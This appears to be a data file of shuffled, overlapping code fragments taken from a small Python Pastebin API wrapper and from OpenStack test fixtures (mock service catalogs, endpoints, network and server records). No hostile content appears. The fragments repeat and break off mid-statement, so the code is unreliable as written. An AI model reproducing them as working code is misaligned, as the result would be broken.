"'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), }",
"PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within a file named \"keys\" as",
"= 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not",
"#!/usr/bin/python3 # Light Pastebin Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import",
"class PasteError(Exception): def __init__(self, response): self.response = response def __str__(self): return repr(self.response) #",
"when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key'",
"paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key,",
"Pastebin with username and password # Returns: user_key, a session key used when",
"'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, }",
"and 'Bad' not in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def",
"a file named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY = ''",
"# Returns: user_key, a session key used when pasting a non-guest paste def",
"200 and 'Bad' not in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception):",
"paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' :",
"'Bad' not in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self,",
"Environment Variable > Function Argument > Constant Defined Here # Recommended: Set confidential",
"keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text",
"PasteError(Exception): def __init__(self, response): self.response = response def __str__(self): return repr(self.response) # Authenticate",
"with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within a file named",
"paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url =",
"paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if",
"PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously",
"if r.status_code == 200 and 'Bad' not in r.text: return r.text else: raise",
"well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD =",
"{ 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' :",
"> Function Argument > Constant Defined Here # Recommended: Set confidential information as",
"def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key'",
"run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' #",
"> Constant Defined Here # Recommended: Set confidential information as environment variables with",
"= '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin # Returns:",
"and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = ''",
"import requests, os # Precedence of Confidential Information: # Environment Variable > Function",
"Argument > Constant Defined Here # Recommended: Set confidential information as environment variables",
"Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential Information:",
"else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response = response def __str__(self):",
"== 200 and 'Bad' not in r.text: return r.text else: raise LoginError(r.text) class",
"and 'Bad' not in r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception): def",
"} url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200 and",
"option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key'",
"return repr(self.response) # Authenticate with Pastebin with username and password # Returns: user_key,",
"a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY',",
": os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r =",
"__init__(self, response): self.response = response def __str__(self): return repr(self.response) # Authenticate with Pastebin",
"file named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME",
": os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url",
"def __str__(self): return repr(self.response) # Authenticate with Pastebin with username and password #",
"LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response def __str__(self): return repr(self.response)",
"# Light Pastebin Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import requests,",
"https://pastebin.com/api import requests, os # Precedence of Confidential Information: # Environment Variable >",
"r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not in r.text:",
"named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME =",
"Pastes code/text anonymously to Pastebin # Returns: paste_url, the URL containing the paste",
"\"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes",
"# Precedence of Confidential Information: # Environment Variable > Function Argument > Constant",
"'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format'",
"paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r =",
"paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='',",
"\"export\" commands within a file named \"keys\" as well and run \"source keys\".",
"'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php'",
"= requests.post(url, data=data) if r.status_code == 200 and 'Bad' not in r.text: return",
"r.status_code == 200 and 'Bad' not in r.text: return r.text else: raise LoginError(r.text)",
"# By Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of",
"Light Pastebin Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os"
] |
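The record above shreds a complete module; reassembled in the fragments' own order, it reads as below. The default for user_password in login() is redacted as <PASSWORD> in the source, so PASTEBIN_USER_PASSWORD is assumed here, matching the constant the module defines beside PASTEBIN_DEV_KEY and PASTEBIN_USER_NAME. Success detection is exactly as in the fragments: HTTP 200 with no 'Bad' substring in the response body.

#!/usr/bin/python3
# Light Pastebin Wrapper, reassembled from the record above.
import os

import requests

# Precedence of confidential information:
# environment variable > function argument > constant defined here.
PASTEBIN_DEV_KEY = ''
PASTEBIN_USER_NAME = ''
PASTEBIN_USER_PASSWORD = ''


# Pastes code/text anonymously to Pastebin.
# Returns: paste_url, the URL containing the paste.
def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste',
          paste_private=0, paste_name='', paste_expire_date='N',
          paste_format='text'):
    data = {
        'api_dev_key': os.getenv('PASTEBIN_DEV_KEY', dev_key),
        'api_user_key': user_key,
        'api_option': option,
        'api_paste_private': str(paste_private),
        'api_paste_name': paste_name,
        'api_paste_expire_date': paste_expire_date,
        'api_paste_format': paste_format,
        'api_paste_code': paste_code,
    }
    r = requests.post('https://pastebin.com/api/api_post.php', data=data)
    if r.status_code == 200 and 'Bad' not in r.text:
        return r.text
    raise PasteError(r.text)


class PasteError(Exception):
    def __init__(self, response):
        self.response = response

    def __str__(self):
        return repr(self.response)


# Authenticates with Pastebin using username and password.
# Returns: user_key, a session key used when pasting a non-guest paste.
def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME,
          user_password=PASTEBIN_USER_PASSWORD):  # default redacted in source; assumed
    data = {
        'api_dev_key': os.getenv('PASTEBIN_DEV_KEY', dev_key),
        'api_user_name': os.getenv('PASTEBIN_USER_NAME', user_name),
        'api_user_password': os.getenv('PASTEBIN_USER_PASSWORD', user_password),
    }
    r = requests.post('https://pastebin.com/api/api_login.php', data=data)
    if r.status_code == 200 and 'Bad' not in r.text:
        return r.text
    raise LoginError(r.text)


class LoginError(Exception):
    def __init__(self, response):
        self.response = response

    def __str__(self):
        return repr(self.response)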
[
"PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None,",
"\"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, {",
"[{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume",
"\"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID,",
"Unless required by applicable law or agreed to in writing, software # distributed",
"and limitations # under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID",
"\"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\":",
"\"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\":",
"u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type':",
"Apache License, Version 2.0 (the \"License\"); you may # not use this file",
"None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\",",
"the License. You may obtain # a copy of the License at #",
"Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL':",
"COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints':",
"= [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS =",
"NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' },",
"None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\",",
"'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS =",
"{ \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\":",
"PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS",
"\"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] },",
"\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": {",
"\"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\":",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None },",
"80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\":",
"\"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [",
"\"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\"",
"with the License. You may obtain # a copy of the License at",
"\"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True,",
"1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [],",
"\"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\"",
"5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\",",
"[{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering",
"'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id':",
"= 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT =",
"SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" }",
"\"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\":",
"\"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [",
"u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } }",
"\"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\",",
"u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type':",
"\"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\":",
"} ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\":",
"None } ] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\":",
"'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' },",
"\"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"\"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\":",
"\"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True,",
"\"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\":",
"\"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\":",
"= 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT =",
"PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\",",
"'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume'",
"\"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\":",
"\"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] }",
"\"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\":",
"\"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\",",
"\"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1],",
"\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\":",
"\"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ],",
"'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } }",
"False } ] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\":",
"\"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\":",
"\"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\": [",
"\"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\":",
"None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\",",
"\"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\":",
"} ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [",
"[ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ {",
"u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' }",
"you may # not use this file except in compliance with the License.",
"the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58',",
"\"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\",",
"\"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\":",
"= [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS =",
"FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\":",
"METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT",
"= 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links':",
"\"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\":",
"\"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None,",
"COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version':",
"'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3',",
"], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\"",
"\"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\":",
"None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\",",
"PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\",",
"[ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\":",
"VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\":",
"], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [",
"{\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\":",
"\"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" }",
"} ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\":",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints':",
"\"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter",
"\"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14,",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"= { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\",",
"\"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] }",
